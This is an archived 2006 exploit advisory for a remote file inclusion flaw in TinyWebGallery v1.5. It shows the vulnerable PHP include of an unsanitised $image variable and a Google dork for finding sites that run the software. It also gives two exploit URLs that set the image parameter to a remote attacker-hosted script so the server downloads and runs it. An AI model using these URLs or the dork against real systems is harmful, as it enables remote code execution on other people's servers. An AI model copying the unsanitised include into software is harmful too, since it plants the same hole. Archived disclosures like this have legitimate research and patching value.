TinyWebGallery v1.5 ( image ) Remote Include Vulnerability

2006-08-11T00:00:00
ID SECURITYVULNS:DOC:13864
Type securityvulns
Reporter Securityvulns
Modified 2006-08-11T00:00:00

Description

C Y B E R - W A R R i O R TIM

TinyWebGallery v1.5 ( image ) Remote Include Vulnerability

------------------------------------------------------------------------

Author: xoron

------------------------------------------------------------------------

Script: TinyWebGallery

------------------------------------------------------------------------

Class: Remote

------------------------------------------------------------------------

cont@ct: x0r0n[at]hotmail[dot]com

------------------------------------------------------------------------

CODE:

<?php

include ($image . ".txt");

?>

------------------------------------------------------------------------

google dork: "powered by twg"

------------------------------------------------------------------------

Exploit:

http://www.site.com/[path]/examples/image.php?image=http://evil_scripts

http://www.site.com/[path]/examples/examples/image.php2?image=http://evi l_scripts?

Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends